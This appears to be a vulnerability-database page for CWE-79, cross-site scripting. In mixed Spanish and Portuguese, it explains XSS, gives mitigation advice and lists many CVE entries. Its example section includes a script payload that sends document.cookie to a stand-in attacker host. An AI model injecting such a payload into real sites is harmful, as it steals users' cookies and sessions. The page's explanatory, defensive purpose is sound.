Fallos del tipo CWE-79

28.943 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2023-36236MEDIUMCross Site Scripting vulnerability in webkil Bagisto v.1.5.0 and before allows an attacker to execute arbitrary code via a crafted SVG file EPSS 0.6%CVE-2022-2395—weForms < 1.6.14 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-2305—WordPress Popup <= 1.9.3.8 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-2328—Flexi Quote Rotator <= 0.9.4 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-2412—Better Tag Cloud <= 0.99.5 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2020-11051MEDIUMXSS in Wiki.jsEPSS 0.6%CVE-2022-2410—mTouch Quiz <= 3.1.3 - Admin+ Stored Cross Site ScriptingEPSS 0.6%CVE-2025-57151HIGHphpgurukul Complaint Management System 2.0 is vulnerable to Cross Site Scripting (XSS) in admin/userprofile.php via the fullname parameter.EPSS 0.6%CVE-2024-4729MEDIUMCampcodes Legal Case Management System expense-type cross site scriptingEPSS 0.6%CVE-2023-7035MEDIUMautomad Setting post.php cross site scriptingEPSS 0.6%CVE-2023-22637MEDIUMAn improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability [CWE-79] in FortiNAC-F version 7.2.0, EPSS 0.6%CVE-2026-82832CRITICALIBM Guardium Data Protection is affected by multiple vulnerabilities.EPSS 0.6%CVE-2022-1324—Event Timeline <= 1.1.5 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-2426—Thinkific Uploader <= 1.0.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2024-1383MEDIUMWPvivid Backup for MainWP <= 0.9.32 - Reflected Cross-Site ScriptingEPSS 0.6%CVE-2022-24395—SAP NetWeaver Enterprise Portal - versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, reEPSS 0.6%CVE-2024-4721MEDIUMCampcodes Complete Web-Based School Management System add_student_subject.php cross site scriptingEPSS 0.6%CVE-2024-4727MEDIUMCampcodes Legal Case Management System court-type cross site scriptingEPSS 0.6%CVE-2022-2215—GiveWP < 2.21.3 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-2411—Auto More Tag <= 4.0.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%